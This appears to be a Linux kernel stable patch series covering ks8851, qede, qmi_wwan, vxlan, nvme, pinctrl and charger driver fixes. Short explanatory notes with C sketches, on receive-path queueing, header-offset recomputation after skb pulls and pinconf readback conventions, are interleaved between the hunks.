+@@ -326,11 +327,11 @@ static void ks8851_rx_pkts(struct ks8851_net *ks)
+ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ {
+ 	struct ks8851_net *ks = _ks;
++	struct sk_buff_head rxq;
+ 	unsigned handled = 0;
+ 	unsigned long flags;
+ 	unsigned int status;
+-
+-	local_bh_disable();
++	struct sk_buff *skb;
+ 
+ 	ks8851_lock(ks, &flags);
+ 
+@@ -384,7 +385,8 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		 * from the device so do not bother masking just the RX
+ 		 * from the device. */
+ 
+-		ks8851_rx_pkts(ks);
++		__skb_queue_head_init(&rxq);
++		ks8851_rx_pkts(ks, &rxq);
+ 	}
+ 
+ 	/* if something stopped the rx process, probably due to wanting
+@@ -408,7 +410,9 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	if (status & IRQ_LCI)
+ 		mii_check_link(&ks->mii);
+ 
+-	local_bh_enable();
++	if (status & IRQ_RXI)
++		while ((skb = __skb_dequeue(&rxq)))
++			netif_rx(skb);
+ 
+ 	return IRQ_HANDLED;
+ }
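The ks8851 fix replaces the local_bh_disable()/local_bh_enable() bracket around per-packet __netif_rx() with a collect-then-deliver scheme: packets are staged on an on-stack sk_buff_head while the device lock is held, and only fed to the stack once the locked section is over. A minimal sketch of the delivery half (demo_* is illustrative):

#include <linux/netdevice.h>
#include <linux/skbuff.h>

static void demo_deliver(struct sk_buff_head *rxq)
{
	struct sk_buff *skb;

	/* __skb_dequeue: the queue is on-stack and private, no locking */
	while ((skb = __skb_dequeue(rxq)))
		netif_rx(skb);
}

The handler's side is just __skb_queue_head_init(&rxq) before the locked section and __skb_queue_tail(&rxq, skb) inside it, as the hunk shows.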
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_filter.c b/drivers/net/ethernet/qlogic/qede/qede_filter.c
+index 3010833ddde33..8871099b99d8a 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_filter.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_filter.c
+@@ -1868,8 +1868,8 @@ int qede_add_tc_flower_fltr(struct qede_dev *edev, __be16 proto,
+ 			    struct flow_cls_offload *f)
+ {
+ 	struct qede_arfs_fltr_node *n;
+-	int min_hlen, rc = -EINVAL;
+ 	struct qede_arfs_tuple t;
++	int min_hlen, rc;
+ 
+ 	__qede_lock(edev);
+ 
+@@ -1879,7 +1879,8 @@ int qede_add_tc_flower_fltr(struct qede_dev *edev, __be16 proto,
+ 	}
+ 
+ 	/* parse flower attribute and prepare filter */
+-	if (qede_parse_flow_attr(edev, proto, f->rule, &t))
++	rc = qede_parse_flow_attr(edev, proto, f->rule, &t);
++	if (rc)
+ 		goto unlock;
+ 
+ 	/* Validate profile mode and number of filters */
+@@ -1888,11 +1889,13 @@ int qede_add_tc_flower_fltr(struct qede_dev *edev, __be16 proto,
+ 		DP_NOTICE(edev,
+ 			  "Filter configuration invalidated, filter mode=0x%x, configured mode=0x%x, filter count=0x%x\n",
+ 			  t.mode, edev->arfs->mode, edev->arfs->filter_count);
++		rc = -EINVAL;
+ 		goto unlock;
+ 	}
+ 
+ 	/* parse tc actions and get the vf_id */
+-	if (qede_parse_actions(edev, &f->rule->action, f->common.extack))
++	rc = qede_parse_actions(edev, &f->rule->action, f->common.extack);
++	if (rc)
+ 		goto unlock;
+ 
+ 	if (qede_flow_find_fltr(edev, &t)) {
+@@ -1998,10 +2001,9 @@ static int qede_flow_spec_to_rule(struct qede_dev *edev,
+ 	if (IS_ERR(flow))
+ 		return PTR_ERR(flow);
+ 
+-	if (qede_parse_flow_attr(edev, proto, flow->rule, t)) {
+-		err = -EINVAL;
++	err = qede_parse_flow_attr(edev, proto, flow->rule, t);
++	if (err)
+ 		goto err_out;
+-	}
+ 
+ 	/* Make sure location is valid and filter isn't already set */
+ 	err = qede_flow_spec_validate(edev, &flow->rule->action, t,
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 2d82481d34e6b..45a542659a814 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1429,6 +1429,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x0489, 0xe0b5, 0)},	/* Foxconn T77W968 LTE with eSIM support*/
+ 	{QMI_FIXED_INTF(0x2692, 0x9025, 4)},    /* Cellient MPL200 (rebranded Qualcomm 05c6:9025) */
+ 	{QMI_QUIRK_SET_DTR(0x1546, 0x1342, 4)},	/* u-blox LARA-L6 */
++	{QMI_QUIRK_SET_DTR(0x33f8, 0x0104, 4)}, /* Rolling RW101 RMNET */
+ 
+ 	/* 4. Gobi 1000 devices */
+ 	{QMI_GOBI1K_DEVICE(0x05c6, 0x9212)},	/* Acer Gobi Modem Device */
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index fbd36dff9ec27..01ce289f4abf0 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1721,6 +1721,7 @@ static int vxlan_rcv(struct sock *sk, struct sk_buff *skb)
+ 	bool raw_proto = false;
+ 	void *oiph;
+ 	__be32 vni = 0;
++	int nh;
+ 
+ 	/* Need UDP and VXLAN header to be present */
+ 	if (!pskb_may_pull(skb, VXLAN_HLEN))
+@@ -1809,9 +1810,25 @@ static int vxlan_rcv(struct sock *sk, struct sk_buff *skb)
+ 		skb->pkt_type = PACKET_HOST;
+ 	}
+ 
+-	oiph = skb_network_header(skb);
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_reset_network_header(skb);
+ 
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(vxlan->dev, rx_length_errors);
++		DEV_STATS_INC(vxlan->dev, rx_errors);
++		vxlan_vnifilter_count(vxlan, vni, vninode,
++				      VXLAN_VNI_STATS_RX_ERRORS, 0);
++		goto drop;
++	}
++
++	/* Get the outer header. */
++	oiph = skb->head + nh;
++
+ 	if (!vxlan_ecn_decapsulate(vs, oiph, skb)) {
+ 		++vxlan->dev->stats.rx_frame_errors;
+ 		++vxlan->dev->stats.rx_errors;
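The vxlan fix is a use-after-realloc pattern worth remembering: any pskb_may_pull()-family call may reallocate skb->head, so a header pointer computed before the pull can dangle. The cure is to keep an offset and recompute. A sketch with plain pskb_may_pull() standing in for the tunnel helper used above:

#include <linux/ip.h>
#include <linux/skbuff.h>

static void *demo_outer_header(struct sk_buff *skb)
{
	int nh = skb_network_header(skb) - skb->head;	/* offset, not pointer */

	skb_reset_network_header(skb);

	if (!pskb_may_pull(skb, sizeof(struct iphdr)))
		return NULL;		/* skb->head may have moved */

	return skb->head + nh;		/* recompute from the saved offset */
}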
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 20160683e8685..75b4dd8a55b03 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4284,7 +4284,7 @@ static int nvme_init_ns_head(struct nvme_ns *ns, struct nvme_ns_info *info)
+ 				"Found shared namespace %d, but multipathing not supported.\n",
+ 				info->nsid);
+ 			dev_warn_once(ctrl->device,
+-				"Support for shared namespaces without CONFIG_NVME_MULTIPATH is deprecated and will be removed in Linux 6.0\n.");
++				"Support for shared namespaces without CONFIG_NVME_MULTIPATH is deprecated and will be removed in Linux 6.0.\n");
+ 		}
+ 	}
+ 
+diff --git a/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c b/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c
+index 80838dc54b3ab..7938741136a2c 100644
+--- a/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c
++++ b/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c
+@@ -43,7 +43,7 @@
+ #define SCU614		0x614 /* Disable GPIO Internal Pull-Down #1 */
+ #define SCU618		0x618 /* Disable GPIO Internal Pull-Down #2 */
+ #define SCU61C		0x61c /* Disable GPIO Internal Pull-Down #3 */
+-#define SCU620		0x620 /* Disable GPIO Internal Pull-Down #4 */
++#define SCU630		0x630 /* Disable GPIO Internal Pull-Down #4 */
+ #define SCU634		0x634 /* Disable GPIO Internal Pull-Down #5 */
+ #define SCU638		0x638 /* Disable GPIO Internal Pull-Down #6 */
+ #define SCU690		0x690 /* Multi-function Pin Control #24 */
+@@ -2494,38 +2494,38 @@ static struct aspeed_pin_config aspeed_g6_configs[] = {
+ 	ASPEED_PULL_DOWN_PINCONF(D14, SCU61C, 0),
+ 
+ 	/* GPIOS7 */
+-	ASPEED_PULL_DOWN_PINCONF(T24, SCU620, 23),
++	ASPEED_PULL_DOWN_PINCONF(T24, SCU630, 23),
+ 	/* GPIOS6 */
+-	ASPEED_PULL_DOWN_PINCONF(P23, SCU620, 22),
++	ASPEED_PULL_DOWN_PINCONF(P23, SCU630, 22),
+ 	/* GPIOS5 */
+-	ASPEED_PULL_DOWN_PINCONF(P24, SCU620, 21),
++	ASPEED_PULL_DOWN_PINCONF(P24, SCU630, 21),
+ 	/* GPIOS4 */
+-	ASPEED_PULL_DOWN_PINCONF(R26, SCU620, 20),
++	ASPEED_PULL_DOWN_PINCONF(R26, SCU630, 20),
+ 	/* GPIOS3*/
+-	ASPEED_PULL_DOWN_PINCONF(R24, SCU620, 19),
++	ASPEED_PULL_DOWN_PINCONF(R24, SCU630, 19),
+ 	/* GPIOS2 */
+-	ASPEED_PULL_DOWN_PINCONF(T26, SCU620, 18),
++	ASPEED_PULL_DOWN_PINCONF(T26, SCU630, 18),
+ 	/* GPIOS1 */
+-	ASPEED_PULL_DOWN_PINCONF(T25, SCU620, 17),
++	ASPEED_PULL_DOWN_PINCONF(T25, SCU630, 17),
+ 	/* GPIOS0 */
+-	ASPEED_PULL_DOWN_PINCONF(R23, SCU620, 16),
++	ASPEED_PULL_DOWN_PINCONF(R23, SCU630, 16),
+ 
+ 	/* GPIOR7 */
+-	ASPEED_PULL_DOWN_PINCONF(U26, SCU620, 15),
++	ASPEED_PULL_DOWN_PINCONF(U26, SCU630, 15),
+ 	/* GPIOR6 */
+-	ASPEED_PULL_DOWN_PINCONF(W26, SCU620, 14),
++	ASPEED_PULL_DOWN_PINCONF(W26, SCU630, 14),
+ 	/* GPIOR5 */
+-	ASPEED_PULL_DOWN_PINCONF(T23, SCU620, 13),
++	ASPEED_PULL_DOWN_PINCONF(T23, SCU630, 13),
+ 	/* GPIOR4 */
+-	ASPEED_PULL_DOWN_PINCONF(U25, SCU620, 12),
++	ASPEED_PULL_DOWN_PINCONF(U25, SCU630, 12),
+ 	/* GPIOR3*/
+-	ASPEED_PULL_DOWN_PINCONF(V26, SCU620, 11),
++	ASPEED_PULL_DOWN_PINCONF(V26, SCU630, 11),
+ 	/* GPIOR2 */
+-	ASPEED_PULL_DOWN_PINCONF(V24, SCU620, 10),
++	ASPEED_PULL_DOWN_PINCONF(V24, SCU630, 10),
+ 	/* GPIOR1 */
+-	ASPEED_PULL_DOWN_PINCONF(U24, SCU620, 9),
++	ASPEED_PULL_DOWN_PINCONF(U24, SCU630, 9),
+ 	/* GPIOR0 */
+-	ASPEED_PULL_DOWN_PINCONF(V25, SCU620, 8),
++	ASPEED_PULL_DOWN_PINCONF(V25, SCU630, 8),
+ 
+ 	/* GPIOX7 */
+ 	ASPEED_PULL_DOWN_PINCONF(AB10, SCU634, 31),
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index f1962866bb814..1ef36a0a7dd20 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -2098,13 +2098,7 @@ int pinctrl_enable(struct pinctrl_dev *pctldev)
+ 
+ 	error = pinctrl_claim_hogs(pctldev);
+ 	if (error) {
+-		dev_err(pctldev->dev, "could not claim hogs: %i\n",
+-			error);
+-		pinctrl_free_pindescs(pctldev, pctldev->desc->pins,
+-				      pctldev->desc->npins);
+-		mutex_destroy(&pctldev->mutex);
+-		kfree(pctldev);
+-
++		dev_err(pctldev->dev, "could not claim hogs: %i\n", error);
+ 		return error;
+ 	}
+ 
+diff --git a/drivers/pinctrl/devicetree.c b/drivers/pinctrl/devicetree.c
+index 6e0a40962f384..5ee746cb81f59 100644
+--- a/drivers/pinctrl/devicetree.c
++++ b/drivers/pinctrl/devicetree.c
+@@ -220,14 +220,16 @@ int pinctrl_dt_to_map(struct pinctrl *p, struct pinctrl_dev *pctldev)
+ 	for (state = 0; ; state++) {
+ 		/* Retrieve the pinctrl-* property */
+ 		propname = kasprintf(GFP_KERNEL, "pinctrl-%d", state);
+-		if (!propname)
+-			return -ENOMEM;
++		if (!propname) {
++			ret = -ENOMEM;
++			goto err;
++		}
+ 		prop = of_find_property(np, propname, &size);
+ 		kfree(propname);
+ 		if (!prop) {
+ 			if (state == 0) {
+-				of_node_put(np);
+-				return -ENODEV;
++				ret = -ENODEV;
++				goto err;
+ 			}
+ 			break;
+ 		}
+diff --git a/drivers/pinctrl/intel/pinctrl-baytrail.c b/drivers/pinctrl/intel/pinctrl-baytrail.c
+index 67db79f380510..a0b7b16cb4de3 100644
+--- a/drivers/pinctrl/intel/pinctrl-baytrail.c
++++ b/drivers/pinctrl/intel/pinctrl-baytrail.c
+@@ -276,33 +276,33 @@ static const unsigned int byt_score_plt_clk5_pins[] = { 101 };
+ static const unsigned int byt_score_smbus_pins[] = { 51, 52, 53 };
+ 
+ static const struct intel_pingroup byt_score_groups[] = {
+-	PIN_GROUP("uart1_grp", byt_score_uart1_pins, 1),
+-	PIN_GROUP("uart2_grp", byt_score_uart2_pins, 1),
+-	PIN_GROUP("pwm0_grp", byt_score_pwm0_pins, 1),
+-	PIN_GROUP("pwm1_grp", byt_score_pwm1_pins, 1),
+-	PIN_GROUP("ssp2_grp", byt_score_ssp2_pins, 1),
+-	PIN_GROUP("sio_spi_grp", byt_score_sio_spi_pins, 1),
+-	PIN_GROUP("i2c5_grp", byt_score_i2c5_pins, 1),
+-	PIN_GROUP("i2c6_grp", byt_score_i2c6_pins, 1),
+-	PIN_GROUP("i2c4_grp", byt_score_i2c4_pins, 1),
+-	PIN_GROUP("i2c3_grp", byt_score_i2c3_pins, 1),
+-	PIN_GROUP("i2c2_grp", byt_score_i2c2_pins, 1),
+-	PIN_GROUP("i2c1_grp", byt_score_i2c1_pins, 1),
+-	PIN_GROUP("i2c0_grp", byt_score_i2c0_pins, 1),
+-	PIN_GROUP("ssp0_grp", byt_score_ssp0_pins, 1),
+-	PIN_GROUP("ssp1_grp", byt_score_ssp1_pins, 1),
+-	PIN_GROUP("sdcard_grp", byt_score_sdcard_pins, byt_score_sdcard_mux_values),
+-	PIN_GROUP("sdio_grp", byt_score_sdio_pins, 1),
+-	PIN_GROUP("emmc_grp", byt_score_emmc_pins, 1),
+-	PIN_GROUP("lpc_grp", byt_score_ilb_lpc_pins, 1),
+-	PIN_GROUP("sata_grp", byt_score_sata_pins, 1),
+-	PIN_GROUP("plt_clk0_grp", byt_score_plt_clk0_pins, 1),
+-	PIN_GROUP("plt_clk1_grp", byt_score_plt_clk1_pins, 1),
+-	PIN_GROUP("plt_clk2_grp", byt_score_plt_clk2_pins, 1),
+-	PIN_GROUP("plt_clk3_grp", byt_score_plt_clk3_pins, 1),
+-	PIN_GROUP("plt_clk4_grp", byt_score_plt_clk4_pins, 1),
+-	PIN_GROUP("plt_clk5_grp", byt_score_plt_clk5_pins, 1),
+-	PIN_GROUP("smbus_grp", byt_score_smbus_pins, 1),
++	PIN_GROUP_GPIO("uart1_grp", byt_score_uart1_pins, 1),
++	PIN_GROUP_GPIO("uart2_grp", byt_score_uart2_pins, 1),
++	PIN_GROUP_GPIO("pwm0_grp", byt_score_pwm0_pins, 1),
++	PIN_GROUP_GPIO("pwm1_grp", byt_score_pwm1_pins, 1),
++	PIN_GROUP_GPIO("ssp2_grp", byt_score_ssp2_pins, 1),
++	PIN_GROUP_GPIO("sio_spi_grp", byt_score_sio_spi_pins, 1),
++	PIN_GROUP_GPIO("i2c5_grp", byt_score_i2c5_pins, 1),
++	PIN_GROUP_GPIO("i2c6_grp", byt_score_i2c6_pins, 1),
++	PIN_GROUP_GPIO("i2c4_grp", byt_score_i2c4_pins, 1),
++	PIN_GROUP_GPIO("i2c3_grp", byt_score_i2c3_pins, 1),
++	PIN_GROUP_GPIO("i2c2_grp", byt_score_i2c2_pins, 1),
++	PIN_GROUP_GPIO("i2c1_grp", byt_score_i2c1_pins, 1),
++	PIN_GROUP_GPIO("i2c0_grp", byt_score_i2c0_pins, 1),
++	PIN_GROUP_GPIO("ssp0_grp", byt_score_ssp0_pins, 1),
++	PIN_GROUP_GPIO("ssp1_grp", byt_score_ssp1_pins, 1),
++	PIN_GROUP_GPIO("sdcard_grp", byt_score_sdcard_pins, byt_score_sdcard_mux_values),
++	PIN_GROUP_GPIO("sdio_grp", byt_score_sdio_pins, 1),
++	PIN_GROUP_GPIO("emmc_grp", byt_score_emmc_pins, 1),
++	PIN_GROUP_GPIO("lpc_grp", byt_score_ilb_lpc_pins, 1),
++	PIN_GROUP_GPIO("sata_grp", byt_score_sata_pins, 1),
++	PIN_GROUP_GPIO("plt_clk0_grp", byt_score_plt_clk0_pins, 1),
++	PIN_GROUP_GPIO("plt_clk1_grp", byt_score_plt_clk1_pins, 1),
++	PIN_GROUP_GPIO("plt_clk2_grp", byt_score_plt_clk2_pins, 1),
++	PIN_GROUP_GPIO("plt_clk3_grp", byt_score_plt_clk3_pins, 1),
++	PIN_GROUP_GPIO("plt_clk4_grp", byt_score_plt_clk4_pins, 1),
++	PIN_GROUP_GPIO("plt_clk5_grp", byt_score_plt_clk5_pins, 1),
++	PIN_GROUP_GPIO("smbus_grp", byt_score_smbus_pins, 1),
+ };
+ 
+ static const char * const byt_score_uart_groups[] = {
+@@ -330,12 +330,14 @@ static const char * const byt_score_plt_clk_groups[] = {
+ };
+ static const char * const byt_score_smbus_groups[] = { "smbus_grp" };
+ static const char * const byt_score_gpio_groups[] = {
+-	"uart1_grp", "uart2_grp", "pwm0_grp", "pwm1_grp", "ssp0_grp",
+-	"ssp1_grp", "ssp2_grp", "sio_spi_grp", "i2c0_grp", "i2c1_grp",
+-	"i2c2_grp", "i2c3_grp", "i2c4_grp", "i2c5_grp", "i2c6_grp",
+-	"sdcard_grp", "sdio_grp", "emmc_grp", "lpc_grp", "sata_grp",
+-	"plt_clk0_grp", "plt_clk1_grp", "plt_clk2_grp", "plt_clk3_grp",
+-	"plt_clk4_grp", "plt_clk5_grp", "smbus_grp",
++	"uart1_grp_gpio", "uart2_grp_gpio", "pwm0_grp_gpio",
++	"pwm1_grp_gpio", "ssp0_grp_gpio", "ssp1_grp_gpio", "ssp2_grp_gpio",
++	"sio_spi_grp_gpio", "i2c0_grp_gpio", "i2c1_grp_gpio", "i2c2_grp_gpio",
++	"i2c3_grp_gpio", "i2c4_grp_gpio", "i2c5_grp_gpio", "i2c6_grp_gpio",
++	"sdcard_grp_gpio", "sdio_grp_gpio", "emmc_grp_gpio", "lpc_grp_gpio",
++	"sata_grp_gpio", "plt_clk0_grp_gpio", "plt_clk1_grp_gpio",
++	"plt_clk2_grp_gpio", "plt_clk3_grp_gpio", "plt_clk4_grp_gpio",
++	"plt_clk5_grp_gpio", "smbus_grp_gpio",
+ };
+ 
+ static const struct intel_function byt_score_functions[] = {
+@@ -454,8 +456,8 @@ static const struct intel_pingroup byt_sus_groups[] = {
+ 	PIN_GROUP("usb_oc_grp_gpio", byt_sus_usb_over_current_pins, byt_sus_usb_over_current_gpio_mode_values),
+ 	PIN_GROUP("usb_ulpi_grp_gpio", byt_sus_usb_ulpi_pins, byt_sus_usb_ulpi_gpio_mode_values),
+ 	PIN_GROUP("pcu_spi_grp_gpio", byt_sus_pcu_spi_pins, byt_sus_pcu_spi_gpio_mode_values),
+-	PIN_GROUP("pmu_clk1_grp", byt_sus_pmu_clk1_pins, 1),
+-	PIN_GROUP("pmu_clk2_grp", byt_sus_pmu_clk2_pins, 1),
++	PIN_GROUP_GPIO("pmu_clk1_grp", byt_sus_pmu_clk1_pins, 1),
++	PIN_GROUP_GPIO("pmu_clk2_grp", byt_sus_pmu_clk2_pins, 1),
+ };
+ 
+ static const char * const byt_sus_usb_groups[] = {
+@@ -467,7 +469,7 @@ static const char * const byt_sus_pmu_clk_groups[] = {
+ };
+ static const char * const byt_sus_gpio_groups[] = {
+ 	"usb_oc_grp_gpio", "usb_ulpi_grp_gpio", "pcu_spi_grp_gpio",
+-	"pmu_clk1_grp", "pmu_clk2_grp",
++	"pmu_clk1_grp_gpio", "pmu_clk2_grp_gpio",
+ };
+ 
+ static const struct intel_function byt_sus_functions[] = {
+diff --git a/drivers/pinctrl/intel/pinctrl-intel.c b/drivers/pinctrl/intel/pinctrl-intel.c
+index 954a412267402..8542053d4d6d0 100644
+--- a/drivers/pinctrl/intel/pinctrl-intel.c
++++ b/drivers/pinctrl/intel/pinctrl-intel.c
+@@ -362,7 +362,7 @@ static const char *intel_get_function_name(struct pinctrl_dev *pctldev,
+ {
+ 	struct intel_pinctrl *pctrl = pinctrl_dev_get_drvdata(pctldev);
+ 
+-	return pctrl->soc->functions[function].name;
++	return pctrl->soc->functions[function].func.name;
+ }
+ 
+ static int intel_get_function_groups(struct pinctrl_dev *pctldev,
+@@ -372,8 +372,8 @@ static int intel_get_function_groups(struct pinctrl_dev *pctldev,
+ {
+ 	struct intel_pinctrl *pctrl = pinctrl_dev_get_drvdata(pctldev);
+ 
+-	*groups = pctrl->soc->functions[function].groups;
+-	*ngroups = pctrl->soc->functions[function].ngroups;
++	*groups = pctrl->soc->functions[function].func.groups;
++	*ngroups = pctrl->soc->functions[function].func.ngroups;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/intel/pinctrl-intel.h b/drivers/pinctrl/intel/pinctrl-intel.h
+index 65628423bf639..0d45063435ebc 100644
+--- a/drivers/pinctrl/intel/pinctrl-intel.h
++++ b/drivers/pinctrl/intel/pinctrl-intel.h
+@@ -36,11 +36,13 @@ struct intel_pingroup {
+ 
+ /**
+  * struct intel_function - Description about a function
++ * @func: Generic data of the pin function (name and groups of pins)
+  * @name: Name of the function
+  * @groups: An array of groups for this function
+  * @ngroups: Number of groups in @groups
+  */
+ struct intel_function {
++	struct pinfunction func;
+ 	const char *name;
+ 	const char * const *groups;
+ 	size_t ngroups;
+@@ -158,11 +160,16 @@ struct intel_community {
+ 		.modes = __builtin_choose_expr(__builtin_constant_p((m)), NULL, (m)),	\
+ 	}
+ 
+-#define FUNCTION(n, g)				\
+-	{					\
+-		.name = (n),			\
+-		.groups = (g),			\
+-		.ngroups = ARRAY_SIZE((g)),	\
++#define PIN_GROUP_GPIO(n, p, m)						\
++	 PIN_GROUP(n, p, m),						\
++	 PIN_GROUP(n "_gpio", p, 0)
++
++#define FUNCTION(n, g)							\
++	{								\
++		.func = PINCTRL_PINFUNCTION((n), (g), ARRAY_SIZE(g)),	\
++		.name = (n),						\
++		.groups = (g),						\
++		.ngroups = ARRAY_SIZE((g)),				\
+ 	}
+ 
+ /**
+diff --git a/drivers/pinctrl/mediatek/pinctrl-paris.c b/drivers/pinctrl/mediatek/pinctrl-paris.c
+index ad873bd051b68..ee72c6894a5d7 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-paris.c
++++ b/drivers/pinctrl/mediatek/pinctrl-paris.c
+@@ -160,20 +160,21 @@ static int mtk_pinconf_get(struct pinctrl_dev *pctldev,
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_SR, &ret);
+ 		break;
+ 	case PIN_CONFIG_INPUT_ENABLE:
+-	case PIN_CONFIG_OUTPUT_ENABLE:
++		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_IES, &ret);
++		if (!ret)
++			err = -EINVAL;
++		break;
++	case PIN_CONFIG_OUTPUT:
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_DIR, &ret);
+ 		if (err)
+ 			break;
+-		/*     CONFIG     Current direction return value
+-		 * -------------  ----------------- ----------------------
+-		 * OUTPUT_ENABLE       output       1 (= HW value)
+-		 *                     input        0 (= HW value)
+-		 * INPUT_ENABLE        output       0 (= reverse HW value)
+-		 *                     input        1 (= reverse HW value)
+-		 */
+-		if (param == PIN_CONFIG_INPUT_ENABLE)
+-			ret = !ret;
+ 
++		if (!ret) {
++			err = -EINVAL;
++			break;
++		}
++
++		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_DO, &ret);
+ 		break;
+ 	case PIN_CONFIG_INPUT_SCHMITT_ENABLE:
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_DIR, &ret);
+@@ -188,6 +189,8 @@ static int mtk_pinconf_get(struct pinctrl_dev *pctldev,
+ 		}
+ 
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_SMT, &ret);
++		if (!ret)
++			err = -EINVAL;
+ 		break;
+ 	case PIN_CONFIG_DRIVE_STRENGTH:
+ 		if (!hw->soc->drive_get)
+@@ -276,26 +279,9 @@ static int mtk_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			break;
+ 		err = hw->soc->bias_set_combo(hw, desc, 0, arg);
+ 		break;
+-	case PIN_CONFIG_OUTPUT_ENABLE:
+-		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_SMT,
+-				       MTK_DISABLE);
+-		/* Keep set direction to consider the case that a GPIO pin
+-		 *  does not have SMT control
+-		 */
+-		if (err != -ENOTSUPP)
+-			break;
+-
+-		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_DIR,
+-				       MTK_OUTPUT);
+-		break;
+ 	case PIN_CONFIG_INPUT_ENABLE:
+ 		/* regard all non-zero value as enable */
+ 		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_IES, !!arg);
+-		if (err)
+-			break;
+-
+-		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_DIR,
+-				       MTK_INPUT);
+ 		break;
+ 	case PIN_CONFIG_SLEW_RATE:
+ 		/* regard all non-zero value as enable */
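The rewritten mtk_pinconf_get() follows the pinconf-generic convention for boolean parameters: a readback of "enabled" returns 0 with the argument filled in, while "disabled" is reported as -EINVAL so that consumers such as the debugfs dump simply omit the option. A sketch of that convention (hypothetical helper):

#include <linux/errno.h>

static int demo_pinconf_get_bool(bool hw_enabled, unsigned long *config)
{
	if (!hw_enabled)
		return -EINVAL;	/* "option not set", per pinconf-generic */

	*config = 1;
	return 0;
}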
+diff --git a/drivers/pinctrl/meson/pinctrl-meson-a1.c b/drivers/pinctrl/meson/pinctrl-meson-a1.c
+index 79f5d753d7e1a..50a87d9618a8e 100644
+--- a/drivers/pinctrl/meson/pinctrl-meson-a1.c
++++ b/drivers/pinctrl/meson/pinctrl-meson-a1.c
+@@ -250,7 +250,7 @@ static const unsigned int pdm_dclk_x_pins[]		= { GPIOX_10 };
+ static const unsigned int pdm_din2_a_pins[]		= { GPIOA_6 };
+ static const unsigned int pdm_din1_a_pins[]		= { GPIOA_7 };
+ static const unsigned int pdm_din0_a_pins[]		= { GPIOA_8 };
+-static const unsigned int pdm_dclk_pins[]		= { GPIOA_9 };
++static const unsigned int pdm_dclk_a_pins[]		= { GPIOA_9 };
+ 
+ /* gen_clk */
+ static const unsigned int gen_clk_x_pins[]		= { GPIOX_7 };
+@@ -591,7 +591,7 @@ static struct meson_pmx_group meson_a1_periphs_groups[] = {
+ 	GROUP(pdm_din2_a,		3),
+ 	GROUP(pdm_din1_a,		3),
+ 	GROUP(pdm_din0_a,		3),
+-	GROUP(pdm_dclk,			3),
++	GROUP(pdm_dclk_a,		3),
+ 	GROUP(pwm_c_a,			3),
+ 	GROUP(pwm_b_a,			3),
+ 
+@@ -755,7 +755,7 @@ static const char * const spi_a_groups[] = {
+ 
+ static const char * const pdm_groups[] = {
+ 	"pdm_din0_x", "pdm_din1_x", "pdm_din2_x", "pdm_dclk_x", "pdm_din2_a",
+-	"pdm_din1_a", "pdm_din0_a", "pdm_dclk",
++	"pdm_din1_a", "pdm_din0_a", "pdm_dclk_a",
+ };
+ 
+ static const char * const gen_clk_groups[] = {
+diff --git a/drivers/power/supply/mt6360_charger.c b/drivers/power/supply/mt6360_charger.c
+index f1248faf59058..383bf19819dfb 100644
+--- a/drivers/power/supply/mt6360_charger.c
++++ b/drivers/power/supply/mt6360_charger.c
+@@ -591,7 +591,7 @@ static const struct regulator_ops mt6360_chg_otg_ops = {
+ };
+ 
+ static const struct regulator_desc mt6360_otg_rdesc = {
+-	.of_match = "usb-otg-vbus",
++	.of_match = "usb-otg-vbus-regulator",
+ 	.name = "usb-otg-vbus",
+ 	.ops = &mt6360_chg_otg_ops,
+ 	.owner = THIS_MODULE,
+diff --git a/drivers/power/supply/rt9455_charger.c b/drivers/power/supply/rt9455_charger.c
+index 72962286d7045..c5597967a0699 100644
+--- a/drivers/power/supply/rt9455_charger.c
++++ b/drivers/power/supply/rt9455_charger.c
+@@ -193,6 +193,7 @@ static const int rt9455_voreg_values[] = {
+ 	4450000, 4450000, 4450000, 4450000, 4450000, 4450000, 4450000, 4450000
+ };
+ 
++#if IS_ENABLED(CONFIG_USB_PHY)
+ /*
+  * When the charger is in boost mode, REG02[7:2] represent boost output
+  * voltage.
+@@ -208,6 +209,7 @@ static const int rt9455_boost_voltage_values[] = {
+ 	5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000,
+ 	5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000,
+ };
++#endif
+ 
+ /* REG07[3:0] (VMREG) in uV */
+ static const int rt9455_vmreg_values[] = {
